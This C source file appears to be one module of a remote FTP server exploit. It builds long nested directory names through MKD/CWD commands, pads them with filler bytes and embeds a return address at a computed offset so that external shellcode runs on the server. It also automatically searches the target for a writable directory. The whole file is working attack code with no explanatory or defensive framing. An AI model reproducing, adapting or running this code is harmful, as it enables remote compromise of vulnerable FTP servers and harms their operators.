#include <stdio.h>
#include "ftp.h"
#include "dir.h"

extern char *dir_hints[4];
extern char shellcode[144];

int dir_create(int len, char *code, long ip_addr, int offset)
{
    char path[256];

    if (ftp_send_cmd(0, "MKD %s\n", code) < 0)
        return -1;
    if (ftp_send_cmd(250, "CWD %s\n", code) < 0)
        return -1;

    dir.len += sizeof(shellcode) + 1;
    offset -= dir.len;
    len -= (dir.len + 100 + 1);

    while(len)
    {
        if (len <= 255) {
	    memset(path, 'T', len);
	    if (offset <= len) {
	        memcpy(&path[offset], (char *)&ip_addr, 4);
		offset = 0;
	    }
            path[len] = '\0';
            if (ftp_send_cmd(0, "MKD %s\n", path) < 0)
		return -1;
            if (ftp_send_cmd(250, "CWD %s\n", path) < 0)
		return -1;
	    if (offset) offset -= len;
            break;
        }
        memset(path, 'T', 255);
	if (offset <= 255) {
	    memcpy(&path[offset], (char *)&ip_addr, 4);
	    offset = 0;
	}
        path[255] = '\0';
        ftp_send_cmd(0, "MKD %s\n", path);
        ftp_send_cmd(250, "CWD %s\n", path);
        len -= 256;
	offset -= 256;
    }
    memset(path, '"', 100);
    path[100] = '\0';
    if (offset) 
	memcpy(&path[offset], (char *)&ip_addr, 4);
    if (ftp_send_cmd(0, "MKD %s\n", path) < 0)
        return -1;
    if (ftp_send_cmd(250, "CWD %s\n", path) < 0)
        return -1;
  
    return 0;
}

int dir_get_len(void)
{
    int len = 0;
    char *ps, *pe;

    if (ftp_send_cmd(257, "PWD\n") < 0)
        return -1;
    if ((ps = (char *)strchr(ftp.reply, '"')) == NULL)
        return -1;
    if ((pe = (char *)strchr(++ps, '"')) == NULL) 
	return -1;
    *pe = '\0';

    if ((len = strlen(ps)) > 1)
	dir.len = 1;
    dir.len += len;

    return 0;
}

int dir_find_writable(void)
{
    int i, ret = 0;
    char *path = NULL;
    struct dir_t *dir;

    printf("\nAttempting to locate writable directory. Trying:\n");
    for (i = 0, path = dir_hints[0]; path; i++, path = dir_hints[i]) {
	printf("\nhint[%d]: %s\n", i, path);
	if (ftp_send_cmd(250, "CWD %s\n", path) < 0)
            continue;
	if (ftp_send_cmd(257, "MKD 7350\n") < 0)
            continue;
	if (ftp_send_cmd(250, "RMD 7350\n") < 0)
            continue;

	goto found;
    }

    memset(&dir_root, 0, sizeof(dir_root));
    strcpy(dir_root.path, ".");

    printf("\nStarting automatic search (This could take a while).\n");
    if (ftp_send_data_cmd(150, PASSIVE, "LIST\n") < 0)
	return -1;
    if ((ret = dir_build_obj(&dir_root, ftp.data)) < 0)
	return -1;
    if (ret) {
	dir = &dir_root;
	goto found;
    }
    if ((dir = dir_walk_kids(&dir_root)) == NULL) {
	error("Writeable directory not found.");
	return -1;
    }

found:
    if (!path) path = dir->sibs->path;
    if (ftp_send_cmd(250, "CWD %s\n", path) < 0)
        return -1;
    printf("Using writable directory: %s\n\n", path);	
    return 0;
}


struct dir_t * dir_walk_kids(struct dir_t *parent)
{
    int bret;
    struct dir_t *dir, *ret;

    for (dir = parent->kids; dir; dir = dir->sibs) {

	if ((ftp_send_cmd(250, "CWD %s\n", dir->path)) < 0)
	    return NULL;
	if (ftp_send_data_cmd(150, PASSIVE, "LIST\n") < 0)
	    return NULL;
	if ((bret = dir_build_obj(dir, ftp.data)) < 0) 
	    return NULL;
        if (bret) 
	    return dir;
	if (dir->kids == NULL) {
	    if (ftp_send_cmd(250, "CWD ..\n") < 0)
		return NULL;
	    continue;
	}
        if ((ret = dir_walk_kids(dir)) == NULL) {
	    if (ftp_send_cmd(250, "CWD ..\n") < 0)
	        return NULL;
	} else
            return ret;
    }
    return NULL;
}

int dir_build_obj(struct dir_t *root, char *data)
{
    char *p, *ep, *sp, *np;
    struct dir_t *dir, *last = NULL;

    if (!data[0])
	return 0;
    if ((p = (char *)strchr(data, '\n')) == NULL)
	return -1;
    p++;

    while ((ep = (char *)strchr(p, '\n'))) {
	if (ep) {
	    ep[-1] = '\0';
	    if (p[0] == 'd') {
		if (p[9] != 'x' || (p[7] != 'r' && p[8] != 'w'))
		    goto again;
		sp = p;
		if ((char *)strstr(sp, "->"))
		    goto again;
		while((np = (char *)strpbrk(sp, " \t\n")))
		    sp = np + 1;
		if (!strcmp(sp, ".") || !strcmp(sp, ".."))
		    goto again;
	        if ((dir = (struct dir_t *)malloc(sizeof(struct dir_t))) == NULL) {
		    error_errno("malloc");
		    return -1;
	        }
		memset(dir, 0, sizeof(struct dir_t));
		if (!root->kids)
		    root->kids = dir;
		strncpy(dir->path, sp, sizeof(dir->path));
		dir->path[sizeof(dir->path)-1] = '\0';
		if (p[8] == 'w') {
		    root->sibs = dir;
		    return 1;
		}
		dir->sibs = NULL;
		if (last)	
		    last->sibs = dir;
		last = dir;
	    }
	}
again:
        ep[-1] = '\r';
	p = ep + 1;
    }
    return 0;
}
